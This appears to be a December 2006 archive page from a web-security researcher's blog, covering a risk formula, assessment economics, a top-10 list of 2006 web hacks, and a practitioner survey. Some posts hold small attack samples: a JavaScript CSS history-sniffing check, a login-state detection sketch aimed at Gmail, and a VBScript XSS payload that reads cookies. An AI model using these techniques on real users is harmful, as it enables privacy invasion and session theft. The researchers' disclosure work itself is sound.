Venture capitalist (Grossman Ventures https://grossman.vc), Internet protector and industry creator. Founded WhiteHat Security & Bit Discovery. BJJ Black Belt.
Thursday, December 28, 2006
Applying the formula
"Once flaws have been identified, what is my motivation to fix them? If you can't give me the likelihood of attack, and what I stand to lose by it being exploited, how many dollars should I invest to repairing it?"
As security practitioners, we continue to say how much the development environments need to learn to make secure software. I'd say there's another side to that coin: security practitioners need to be able to measure the impact of particular threats in terms of dollars, so that we don't just reveal vulnerabilities and the threats that might exploit them, but what the business stands to lose if the vulnerability isn't fixed.
Very well stated, and it got me thinking about how this could be done. For some reason the movie Fight Club popped into my head, with the scene about how Jack, as an automotive manufacturer recall coordinator, applied "the formula". Seemed like a fun way to go about it. :)
JACK (V.O.)
I'm a recall coordinator. My job is to apply the formula.
....
JACK (V.O.)
Take the number of vehicles in the field, (A), and multiply it by the probable rate of failure, (B), then multiply the result by the average out-of-court settlement, (C). A times B times C equals X...
JACK
If X is less than the cost of a recall, we don't do one.
BUSINESS WOMAN
Are there a lot of these kinds of accidents?
JACK
Oh, you wouldn't believe.
BUSINESS WOMAN
... Which... car company do you work for?
JACK
A major one.
I know I know, I broke the first rule of Fight Club. Anyway, I have no idea how "real" this formula is or if it's applied, but it seemed to make sense. I wondered if something similar could be applied to web application security. If nothing else, it's an entertaining exercise.
Take the number of known vulnerabilities in a website, (A), and multiply it by the probability of malicious exploitation, (B), then multiply the result by the average financial cost of handling a security incident, (C). A times B times C equals X...
If X is less than the cost of fixing the vulnerabilities, we won't.
Sounds like it could work, provided you could be somewhat accurate in filling in the variables, which is the hard part. The thing is, this process probably isn't a suitable task for an information security person. Maybe we need to seek the assistance of an economist or a probability theorist and see what they have to say.
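To make the arithmetic concrete, here is a rough JavaScript sketch of the formula; every number in it is invented purely for illustration.

// A rough sketch of the recall-style formula; all values are made up.
var knownVulns   = 20;      // A: known vulnerabilities in the website
var exploitProb  = 0.10;    // B: probability of malicious exploitation
var incidentCost = 150000;  // C: average cost of handling a security incident (US$)
var fixCost      = 100000;  // estimated cost to fix the vulnerabilities (US$)

var expectedLoss = knownVulns * exploitProb * incidentCost;  // X = A * B * C

if (expectedLoss < fixCost) {
  alert("X ($" + expectedLoss + ") is less than the fix cost, so we don't fix.");
} else {
  alert("X ($" + expectedLoss + ") is more than the fix cost, so we fix.");
}

With these made-up values, X works out to $300,000, which is greater than the $100,000 fix cost, so the formula says fix. Garbage in, garbage out, of course; the hard part remains estimating B and C.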
Moving forward: the knowns and unknowns
I think the reason behind the lack of consensus is a void of data and/or a means to measure success. We’re essentially flying blind. Let’s rhetorically consider several questions people commonly ask:
“How do I find out how many websites I have?”
“What do they do and how *important* are they?”
“Who’s responsible for them?”
Digging into a single website….
“How large and complex is the code base?”
“What’s the rate of application code change?”
Narrowing down to vulnerabilities…
“What vulnerabilities do I have?”
“Whose fault is it, and how do I prioritize their remediation?”
“What do I do to protect myself in the meantime?”
Finally organizational changes…
“Which should I focus on, developer education or the use of a modern development framework?”
“Which testing process is better, white box or black box or glass box?”
Answering these questions is anything but simple; the answers depend on any number of factors, are unknown to any single person, and vary from organization to organization. The point is an organization must be able to understand its current state of affairs. And we as an industry must be able to measure whether a particular strategy or solution is working, and if so, how well. This brings us to where I think we are today: best practices based upon conventional wisdom held over from other areas of information security, which do not apply here. A harsh reality.
To begin looking at things from a fresh perspective, I find it's helpful to line up the "knowns" and "unknowns" for a particular problem set. From there it’s easier to spot trends, relationships, inconsistencies, and areas that should yield immediate return from investigation.
- Among what would normally be considered the largest, most popular, and most “secure” websites, the vast majority are found to have serious vulnerabilities. We have no idea about the security of the mid- and lower-end websites, which are typically not assessed.
- Those typically in charge of information security do not have the same level of control over the safety of their websites as they do at the network infrastructure level. Consequently, the responsibility of website security is unassigned or rests among several constituencies.
- Attacks targeting the web application layer are growing year over year in number, sophistication, and maliciousness. Real-world visibility into these attacks is extremely limited.
- Firewalls, patching, configuration, transmission/database encryption, and strong authentication solutions do not protect against the majority of web applications vulnerabilities.
- All software has defects and in turn will have vulnerabilities. Security enhancements provided by modern development frameworks help to prevent vulnerabilities, though will not eliminate them altogether. Measured benefit is unknown.
- The change rate of commerce web applications is relatively rapid, with frequent incremental revisions. Traditional PC or enterprise software tends to be slower, with larger versioned builds. Web applications tend to have a steady and faster flow of vulnerabilities.
- Developer education in software security and implementing security testing inside the quality assurance phase reduce the number of vulnerabilities, but will not eliminate them (see the point above about software defects). The overall expected reduction of vulnerabilities as a result is unknown.
- It’s impossible to find all vulnerabilities through automation, so thorough security testing requires a significant amount of experienced human time. How much time is required and how close the process will come to finding everything is debatable.
- Web application security is a new and complex subject for which there is a limited population of experienced practitioners relative to the amount of workload.
- Web browser security is largely and fundamentally broken, leaving browsers unable to protect users against modern attacks. The situation hasn’t significantly improved with Firefox 2.0 or Internet Explorer 7.0, and it’s unclear whether future releases will attempt to address the problem.
- Solutions must come from areas other than "fixing" the code
- We need to invest resources into measuring ROI from various solutions and best-practices
- Create training and perhaps certification programs for web application security professionals
- We need wider visibility into the real-world hacks
- We need to develop and implement new and innovative security designs for modern web browsers
Tuesday, December 26, 2006
The future of web application vulnerability assessment is about scale
Where are we now?
- 105 million sites are on the Web with 4 million new ones each month.
- Perhaps hundreds (?) of thousands of websites collect or distribute personal information, financial and healthcare data, credit card numbers, intellectual property, trade secrets, etc.
- Web application issues top every major Top-X vulnerability list.
- 8 out of 10 websites are full of holes, and most of the attacks are targeting the web application layer.
- Assessments should be performed after each code change or "major" release and require about a week or two of human-time to complete.
Analyzing the scope using some assumptions:
- 500,000 “important” websites (roughly 1/2 of 1% of the total population)
- Assessments 2-times a year per website. (Vary on change rate)
- An expert can perform 40 assessments per year with base salary of $100,000 (US).
- Retail cost per assessment $5,000 (US). (Normally higher ranging between $8,000 - $15,000)
Today we'd need:
- 1 million total vulnerability assessments
- 25,000 experienced experts in web application VA
- $2,500,000,000 (US) in salary for web application experts
- $5,000,000,000 (US) retail assessment cost
Of course, as awareness of web application security builds, these numbers will climb, but for now we have to face facts. And the fact is that unless we can vastly improve the web application VA process, most websites will not be assessed for security and will remain insecure. That’s what’s going on today. And that’s why I’m saying the future of web application vulnerability assessment is about scale.
While we certainly can’t reduce the number of “important” websites, we can reduce the man-hours and expertise required to perform an assessment using technology and modern processes. Modern assessment processes need to be highly streamlined, repeatable, able to run thousands of assessments concurrently, and performable by less than top-tier webappsec experts. This is what it truly means to “scale”.
How much improvement can be made in the near term is a subject of much debate, but we’re working on it. For fun, let’s try a few more guesses at how certain efficiencies will help.
Future improvements:
- 500,000 “important” websites (roughly 1/2 of 1% of the total population)
- Assessments 2-times a year per website. (Vary on change rate)
- An expert can perform 200 (up from 40) assessments per year with a base salary of $80,000 (down from $100,000) (US).
- Retail cost per assessment $2,000 (down from $5,000) (US).
- 1 million total vulnerability assessments
- 5,000 experienced experts in web application VA
- $400,000,000 (US) in salary for web application experts
- $2,000,000,000 (US) retail assessment cost
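To recap the arithmetic behind both sets of numbers, here is a small JavaScript sketch using the same assumptions listed above.

// Back-of-the-envelope math for the assessment-scale problem.
function assessmentEconomics(sites, assessmentsPerSite, perExpertPerYear, salary, retailPrice) {
  var totalAssessments = sites * assessmentsPerSite;        // assessments needed per year
  var expertsNeeded    = totalAssessments / perExpertPerYear;
  return {
    assessments: totalAssessments,
    experts:     expertsNeeded,
    salaryTotal: expertsNeeded * salary,                    // total expert salary
    retailTotal: totalAssessments * retailPrice             // total retail assessment cost
  };
}

var today  = assessmentEconomics(500000, 2, 40, 100000, 5000);
// 1,000,000 assessments, 25,000 experts, $2.5 billion in salary, $5 billion retail

var future = assessmentEconomics(500000, 2, 200, 80000, 2000);
// 1,000,000 assessments, 5,000 experts, $400 million in salary, $2 billion retail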
Friday, December 22, 2006
Secure Code Through Frameworks
105 million sites make their home on the Web - 4 million more move in each month. That’s a staggering number to think about, and as we well know, the vast majority of websites (I say 8 in 10) have serious security issues. Industry discussions go round and round about what should be done. We talk about secure coding practices, training, compliance, assessment, source-code audits, and the like. What’s going to work? Then I read something Robert Auger posted, arguing that the lack of security-enabled frameworks is why we’re vulnerable, which touches on an area I’ve thought a lot about recently.
Friday, December 15, 2006
Top 10 Web Hacks of 2006
Attacks always get better, never worse. That’s probably what I’ll remember most about 2006. What a year it’s been in web hacking! There’s never been such a big leap forward in the industry, and frankly it’s really hard to keep up. My favorite quote came today from Kryan:
"The last quarter of this year, RSnake and Jeremiah pretty much destroyed any security we thought we had left. Including the "I'll just browse without javascript" mantra. Could you really call that browsing anyways?"
To look back on what’s been discovered, RSnake, Robert Auger, and I collected as many of the new 2006 web hacks as we could find. We’re using the term "hacks" loosely to describe some of the more creative, useful, and interesting techniques/discoveries/compromises. There were about 60 to choose from, making the selection process REALLY difficult. After much email deliberation we believe we created a solid Top 10. Below you’ll find the entire list in no particular order. Enjoy!
Top 10
- Web Browser Intranet Hacking / Port Scanning - (with JavaScript and with HTML-only and the improved model)
- Internet Explorer 7 "mhtml:" Redirection Information Disclosure
- Anti-DNS Pinning and Circumventing Anti-Anti DNS pinning
- Web Browser History Stealing - (with CSS, evil marketing, JS login-detection, and authenticated images)
- Backdooring Media Files (QuickTime, Flash, PDF, Images, Word [2], and MP3's)
- Forging HTTP request headers with Flash
- Exponential XSS
- Encoding Filter Bypass (UTF-7, Variable Width, US-ASCII)
- Web Worms - (AdultSpace, MySpace, Xanga)
- Hacking RSS Feeds
Honorable Mention
- Stealing User Information Via Automatic Form Filling
- Advanced Web Attack Techniques using GMail (Overwriting the Array Constructor)
- Google Vulnerable Code Dork
Full List
The Attack of the TINY URLs
Backdooring MP3 Files
Backdooring QuickTime Movies
CSS history hacking with evil marketing
I know where you've been
Stealing Search Engine Queries with JavaScript
Hacking RSS Feeds
MX Injection : Capturing and Exploiting Hidden Mail Servers
Blind web server fingerprinting
JavaScript Port Scanning
CSRF with MS Word
Backdooring PDF Files
Exponential XSS Attacks
Malformed URL in Image Tag Fingerprints Internet Explorer
JavaScript Portscanning and bypassing HTTP Auth
Bruteforcing HTTP Auth in Firefox with JavaScript
Bypassing Mozilla Port Blocking
How to defeat digg.com
A story that diggs itself
Expect Header Injection Via Flash
Forging HTTP request headers with Flash
Cross Domain Leakage With Image Size
Enumerating Through User Accounts
Widespread XSS for Google Search Appliance
Detecting States of Authentication With Protected Images
XSS Fragmentation Attacks
Poking new holes with Flash Crossdomain Policy Files
Google Indexes XSS
XML Intranet Port Scanning
IMAP Vulnerable to XSS
Detecting Privoxy Users and Circumventing It
Using CSS to De-Anonymize
Response Splitting Filter Evasion
CSS History Stealing Acts As Cookie
Detecting Firefox Extensions
Stealing User Information Via Automatic Form Filling
Circumventing DNS Pinning for XSS
Netflix.com XSRF vuln
Browser Port Scanning without JavaScript
Widespread XSS for Google Search Appliance
Bypassing Filters With Encoding
Variable Width Encoding
Network Scanning with HTTP without JavaScript
AT&T Hack Highlights Web Site Vulnerabilities
How to get linked from Slashdot
F5 and Acunetix XSS disclosure
Anti-DNS Pinning and Circumventing Anti-Anti DNS pinning
Google plugs phishing hole
Nikon magazine hit with security breach
Governator Hack
Metaverse breached: Second Life customer database hacked
HostGator: cPanel Security Hole Exploited in Mass Hack
I know what you've got (Firefox Extensions)
ABC News (AU) XSS linking the reporter to Al Qaeda
Account Hijackings Force LiveJournal Changes
Xanga Hit By Script Worm
Advanced Web Attack Techniques using GMail
PayPal Security Flaw allows Identity Theft
Internet Explorer 7 "mhtml:" Redirection Information Disclosure
Bypassing of web filters by using ASCII
Selecting Encoding Methods For XSS Filter Evasion
Adultspace XSS Worm
Anonymizing RFI Attacks Through Google
Google Hacks On Your Behalf
Google Dorks Strike Again
Thursday, December 14, 2006
I know if you're logged-in, anywhere
The CSS History hack is a well-known brute-force way to uncover where a victim user has traveled. Great Firefox extensions like SafeHistory are helping protect against this simple hack, but the cat-and-mouse game continues. Despite this tool, I’ve found a new way to tell where the user has been AND also whether they are “logged-in”. People are frequently and persistently logged in to popular websites. Knowing which ones can be extremely helpful for improving the success rate of CSRF or Exponential XSS attacks, as well as other nefarious information-gathering activities.
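For reference, the classic CSS history check looks roughly like the following sketch. It assumes a 2006-era browser without SafeHistory installed, and the probed URL is just an example.

// Sketch of the CSS :visited history check (old browsers; now mitigated).
var css = document.createElement('style');
css.appendChild(document.createTextNode('a.probe:visited { color: rgb(255, 0, 0); }'));
document.getElementsByTagName('head')[0].appendChild(css);

function hasVisited(url) {
  var link = document.createElement('a');
  link.href = url;
  link.className = 'probe';
  document.body.appendChild(link);
  // Older browsers leak whether the :visited rule applied via the computed style.
  var color = window.getComputedStyle(link, null).getPropertyValue('color');
  document.body.removeChild(link);
  return color === 'rgb(255, 0, 0)';
}

alert('Visited? ' + hasVisited('http://mail.google.com/mail/'));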
The new technique uses a method similar to JavaScript Port Scanning, matching errors from the JavaScript console. Many websites requiring login have URLs that return different HTML content depending on whether or not you're logged in. For instance, the “Account Manager” web page can only be accessed if you’re properly authenticated. If these URLs are dynamically loaded into a <* script src=””> tag, they will cause the JS console to error differently because the response is HTML, not JS. The type of error and line number can be pattern matched.
Using Gmail as an example, <* script src=” http://mail.google.com/mail/”>
If you are logged-in…
If you are NOT logged-in…
I mapped the error messages from a few popular websites and made some PoC code.
Firefox Only! (1.5 – 2.0) tested on OS X and WinXP. I don’t want to hear it about IE and Opera. :)
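For those curious, here is a rough sketch of the general idea rather than the actual PoC; the URL and the "logged-in" error line number below are hypothetical and have to be mapped per site, as described above.

// Sketch: fingerprint login state from the JS error a cross-domain HTML page throws.
window.onerror = function (message, url, line) {
  // The HTML returned by the target URL isn't valid JavaScript, so the parser
  // errors out; the line number differs between logged-in and logged-out pages.
  if (line === 4) {                      // hypothetical "logged-in" signature
    alert('Victim appears to be logged in');
  } else {
    alert('Victim appears to be logged out');
  }
  return true;                           // suppress the error in the JS console
};

// ...then load the target page as if it were a script, exactly as above:
// <* script src="http://mail.google.com/mail/">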
Wednesday, December 13, 2006
Looking back at my predictions for 2006
Research in 2006
1) I think there is going to be a lot of research, on the white hat and black hat sides, in the area of web-based worms. Lots of creating and trading of JavaScript exploit code once an XSS issue is found.
Right on the money. Of course this might have been a self-fulfilling prophecy. :) Those are the best kind.
Commercial landscape in 2006
Personally I think compliance, specifically PCI, is going to be a big driver to improve web application security.
Blech, way off. PCI is a good standard with decent web application security components, but the enforcement of validation of compliance leaves something to be desired. When network scanning vendors can meet the minimum webappsec criteria with only the most rudimentary checks, then clearly there is improvement required. Checkbox != security. Maybe PCI will be a real driver by 2008. Time will tell.
To meet the requirements, I expect vendors will combine various types of vulnerability assessment products through innovation or acquisition. Current product/service offerings separate the network, CGI, and web application assessment layers. Some combine two, but not all three.
Off yet again. I still think this will happen, I just don't know exactly when. I thought it would have taken place already.
To pass PCI quickly, we'll see people looking for simple solutions or hacks to clean up their vulnerabilities. Not everyone has the resources available to fix their web app code the right way. As a result, I expect new web server add-ons (or WAF's) and configuration set-ups will be employed as band-aids to prevent the identification of vulnerabilities. This will create an interesting challenge for the industry.
Let's call this a 50/50. I was correct about a huge increase in web application firewall deployments in the market, led by ModSecurity and other commercial players. Way more WAF's on the Web than there were in 2004 and 2005. However, this didn't have anything to do with meeting PCI or a band-aid approach as I guessed. Most deployments I've seen have been towards defense-in-depth, bravo, but I was wrong in the prediction. :)
Then a few other predictions:
* a variety of different product/service standards
Nope. Wrong.
* certifications for web application security professionals
Wrong again!
* other industries begin implementing PCI-like security standards
Sheesh, way off.
I'm no Nostradamus, that's for sure.
Friday, December 08, 2006
Business Logic Flaws and Yahoo Games
"A few years back, Yahoo Games instituted an online chess ladder. A ladder system essentially ranks all the players from top to bottom, and you move up by beating people ranked higher on the ladder. Losing (or not playing) slowly lowers your ranking.
I'm a decent player—I won the state championship of Kentucky in my salad days—but couldn't begin to approach the top of Yahoo's ladder. But guess what? The people at the top weren't playing chess at all!
They were cheaters, a closed circle of players passing the crown around by systematically losing one-move games to each other. Player No. 2 challenges Player No. 1, makes one move to start the game, and then Player No. 1 resigns the game and they switch rankings on the ladder. "
There are literally thousands of people (or more) with an amazing amount of free time to spend on the most mundane tasks for the most inane rewards. “Cheating” players would code purpose-built programs to bot hundreds of chess games simultaneously, 24x7. They’d sit up late into the evening because every so often the ladder ranks would be reset, and when they were, they’d snatch the top spots. And once they owned a block of the top spots, they’d only play within their controlled accounts to rise slowly in the ranks. The way the ladder logic worked, “legit” ranked players had to play against other equally or higher-ranked players, and since cheaters wouldn’t play against them, legit players would drop in rank.
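To illustrate the business logic flaw, here is my guess at the ranking rule in JavaScript. This is how I read the story, not Yahoo's actual code.

// Hypothetical ladder logic: a win over a higher-ranked player swaps positions.
// Nothing checks game length, move count, or whether both accounts collude.
function recordResult(ladder, winner, loser) {
  var w = ladder.indexOf(winner);
  var l = ladder.indexOf(loser);
  if (w > l) {                 // winner was ranked below the loser (index 0 = rank #1)
    ladder[w] = loser;
    ladder[l] = winner;        // simple swap: the exploitable "business logic"
  }
}

var ladder = ['cheaterA', 'cheaterB', 'legitPlayer'];
recordResult(ladder, 'cheaterB', 'cheaterA');   // one-move game, instant resignation
// ladder is now ['cheaterB', 'cheaterA', 'legitPlayer'], the crown passed around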
All that just to be at the top of the Yahoo Chess games ladder. No monetary reward, no praise, no nothing. Makes you think where else this is going on doesn’t it?
Thursday, December 07, 2006
Ryan Barnett enters the Blogosphere
Wednesday, December 06, 2006
Web Application Security Professionals Survey (Dec. 2006)
"The scary unknown is intranet Website vulnerability, however, which the survey did not address. "There are no good metrics for how many intranet Websites there are, or how vulnerable they are. That's a big unknown in the industry," Grossman says. "It's a whole other world inside the firewall."
Update: Once again a great survey turnout. A total of 63 respondents. Thank you to everyone who responded and to those who helped me out with the questions. We didn't reach my prediction of 100, but that's OK because I'm not very good at those anyway. :) We'll try to get there in January. The problem is it's getting difficult to manage this by email; I'll have to figure out some way to remedy that. The data collected certainly did not disappoint and some interesting things bubbled to the top.
My Observations
Good representation from both security vendors and enterprise professionals. Most of which have several years of experience, a significant percentage of their time dedicated to web application security, and performed 1 - 40 assessments in 2006. An experienced bunch I’d say.
About half of respondents say organizations have vulnerability assessments performed primarily to measure how secure they are, and about a quarter say compliance. I would have figured measurement would have scored higher and compliance lower. Maybe we’re seeing a shift in the industry.
The vast majority of webappsec professionals believe assessments should be performed after each code change or "major" release, say they take a week or two to complete, and rarely encounter multi-factor authentication or web application firewalls. About half of the people using commercial scanners say the scanners complete about half or less of their workload. The other half, who don’t use them, say assessments are faster to do by hand, the scanners have too many false positives, or they're too expensive. There is much more to talk about here, but that’ll come in another post.
Question 12a on disclosure yielded some interesting results. The majority of people are evenly split between “responsible” and “non” disclosure. Think about that. Just as many are disclosing as are keeping quiet because of the inherent risk. As I’ve said before, discovery is going to be a big issue moving forward. We’re going to lose the check and balance we’ve relied upon with traditional commercial and open source software.
Description
It's been a month already since the last survey. In November we got a great turnout, doubling the response from October. Maybe this time we'll reach 100 respondents. Anyway...
If you perform web application vulnerability assessments, whether personally or professionally, this survey is for you. 15 multiple choice questions designed to help us understand more about the industry in which we work. Most of us in InfoSec dislike taking surveys, however the more people who respond the more informative the data will be. So far the information collected has been really popular and insightful. And a lot of people helped out with the formation of these questions.
================================================================
Guidelines
- Open to those who perform web application vulnerability assessments/pen-tests
- Email your answers to jeremiah __at__ whitehatsec.com
- To curb fake submissions please use your real name, preferably from your employers domain.
- Submissions must be received by December 14.
Privacy: Absolutely no names or contact information will be released to anyone. Though feel free to self publish your answers (blogs).
================================================================
Questions
1) What type of organization do you work for?
a) Security vendor / consultant (63%)
b) Enterprise (23%)
e) Other (please specify) (10%)
c) Government (5%)
d) Educational institution (0%)
2) What portion of your job is dedicated to web application security (as opposed to development, general security, incident response, etc)?
a) All or almost all (53%)
b) About half (28%)
c) Some (20%)
d) None (0%)
3) How many years have you been working in the web application security field?
c) 2 - 4 (33%)
e) 6+ (25%)
d) 4 - 6 (20%)
b) 1 - 2 (13%)
a) Less than a year (10%)
4) In your experience, what's the primary reason why organizations have web application vulnerability assessments performed?
a) To measure how secure they are, or not (53%)
b) Industry regulation and/or compliance (25%)
c) Customers or partners ask for independent third-party validation (10%)
e) Other (please specify) (10%)
d) No idea (3%)
5) How often should web applications be assessed for vulnerabilities?
a) After every code change (65%)
e) Other (please specify) (20%) - Answers mostly revolved around "major" releases.
c) Quarterly (10%)
b) Annually (5%)
d) Before the auditors arrive (0%)
6) How many web application vulnerability assessments have you personally conducted this year (2006)?
b) 1 - 20 (50%)
c) 20 - 40 (23%)
d) 40 - 60 (13%)
e) 60+ (10%)
a) None (5%)
7) How many man-hours does it take you to complete a web application vulnerability assessment on the average website?
c) 20 - 40 (50%)
b) 0 - 20 (23%)
d) 60 - 80 (23%)
e) 80+ (5%)
a) None (0%)
Please ONLY answer ONE of the two following questions (#8 and #9)
Commercial Vulnerability Scanners: (Acunetix, Cenzic, Fortify, NTOBJECTives, Ounce Labs, Secure Software, SPI Dynamic, Watchfire, etc.)
8) If commercial vulnerability scanners ARE part of your tool chest, how much of your preferred assessment methodology do they complete? 36 respondents (57%)
c) About half (58%)
d) A little bit (33%)
e) Not much (4%)
b) Most of it (4%)
a) All or almost all (0%)
9) If commercial vulnerability scanners are NOT part of your tool chest, why not? 27 respondents (43%)
d) Some combination of a, b, and c (61%)
a) Too many false positives (11%)
c) Faster to do assessments by hand (11%)
b) Too expensive (6%)
e) Haven't tried any of them (6%)
f) Other (please specify) (6%)
10) How often do you encounter web application firewalls blocking your attacks during a vulnerability assessment?
d) Never, or almost never (73%)
c) Sometimes (10%)
e) Hard to tell (10%)
b) About half of the time (5%)
a) A lot (3%)
11) While performing web application vulnerability assessment, how often do you encounter websites requiring multi-factor authentication?
(Hardware token, software token, secret questions, one-time passwords, etc.)
d) Never, or almost never (50%)
c) Sometimes (35%)
b) About half of the time (8%)
a) A lot (5%)
e) Hard to tell (3%)
12a) If you find a vulnerability in a website you don't have written permission to test, what do you do with the data MOST of the time?
b) Inform the website administrators (responsible disclosure) (36%)
c) Keep it to yourself, no sense risking jail or lawsuits (36%)
e) Other (please specify) (18%)
a) Post it sla.ckers.org (full-disclosure) (8%)
d) Sell it (3%)
Daniel Cuthbert: "WALK AWAY! spending 1 year fighting the british government over this exact thing made me realise this lone cowboy approach will never work :0)"
12b) How has the security of the average website changed this year (2006) vs. last year (2005)?
c) Same (50%)
b) Slightly more secure (28%)
d) Worse (20%)
a) Way more secure (3%)
e) No idea (0%)
13) What do you think of RSnake's XSS cheat sheet?
http://ha.ckers.org/xss.html
b) I like it (55%)
a) It rocks! (28%)
c) It has the basics, but there are more options (13%)
e) Never heard of it (5%)
d) Lame (0%)
14) Do you surf the Web with JavaScript turned off?
c) No (38%)
b) Sometimes (33%)
a) Yes (18%)
d) Only when clicking on links from Jeremiah (10%)
15) What operating system are you using to answer this question?
a) Windows (68%)
b) OS X (15%)
c) Linux (15%)
d) BSD (3%)
e) Other (please specify) (0%)
BONUS
16) The most valuable web application security tip/trick/idea/concept/hack/etc you learned this year (2006)? List just 1 thing. *Full list will be published*
When forms convert lower case to uppercase, use VBScript to test for XSS since it is not case sensitive like JavaScript: <* script type=text/vbscript>alert(DOCUMENT.COOKIE)<* /script>
When spidering a website use your standard USER AGENT, then crawl it again
Using JavaScript for more than just stealing cookies :-P
The research and disclosure being done on sla.ckers.org and gnucitizen.org.
JavaScript Malware Intranet Hacking
I don't remember.
combination of XSS and XHR. (My next PoC will show you why)
Javascript Scanning
Blind SQL injection in MSSQL and MySQL, complex XSS injection (using the great http://ha.ckers.org/xss.html)
I can tell you, but then I will have to sign you on an NDA :-)
XSS Shell
XSRF
mhtml: vulnerability - complete read access to the Internet on Internet Explorer. Scary!
Learned none.
This might not be web app related until after Vista is released (yeah, right): I found interesting the concept of how to discover whether Visual Studio binaries have been /GS compiled, used to mitigate local stack variable overflows.
Sorry, I'm restricted from saying. :/ I guess my best/most valuable tip that I use every time is don't become dependent on any one tip/trick/idea/concept/hack. :)
What cross domain restrictions? The web security model was completely smashed up this year and I don't pretend to claim to be smart enough to fix it. But what we got isn't working the way we thought it did.
I've found some new tools to try out, such as TamperIE, which I picked up from the "Hacking Web Applications Exposed 2nd Edition" book I purchased, and I believe you wrote the foreword. Plus I have to hand it to RSnake, id, maluc and the other people on sla.ckers.org, they just keep coming up with new attack vectors. Their disclosures can be a little frightening. As you said in the foreword, sometimes we just want to bury our head in the sand because we know most of the sites out there have vulnerabilities.
CSRF (Just after I tested a bloody forum too!)
improving my XSS knowledge with the awesome help of ha.ckers.org and sla.ckers.org
Learning more about web services, SOAP, XML, etc.
That demonstrating issues to a vendor/customer is much less effective than expressing the business liability and risk in $s :-)
Fully understanding AJAX, which is important, even if all I learned was that it wasn't as big a deal as I expected it to be from a security standpoint (it is a much bigger deal from developer and user viewpoints).
There is nothing new under the sun. People still do dumb things.
XSS + Ajax avoids the same-domain security sandbox.
Bypassing filtering mechanisms by UTF-16 encoding URLs even when there's no need to
Using POST content as a query string in most cases won't affect the way the receiving application reacts. Attacks are more portable and easier to demonstrate in link format.
Implications of Flash 9 crossdomain.xml, including flaws in the implementation and severe lack of best practice standards. The floodgates may be open on client-side code with cross-domain privileges (Quicktime, etc.), but it's good to see a misstep at least happening in the right direction.
This is my statement for the web application security year 2006:
Everyone can find an XSS vulnerability, but fortunately only a few people can imagine what this really means.
Automating viewstate injection. Maybe I'll release some notes about it.
Nothing can replace experience!
session riding
XSS
Watch out for that stupid UTF-7 encoding.
Search myspace for answers to secret questions :)
Intranet IP scanning really opened up my thinking of what XSS could be used to accomplish.
Sunday, December 03, 2006
Followup: Myth-Busting AJAX (In)-Security
Anyway, as RSnake pointed out, it’s been a busy week with a ton of new tricks posted. Maybe someone is going to start combining these into something better. JavaScript Malware continues to evolve.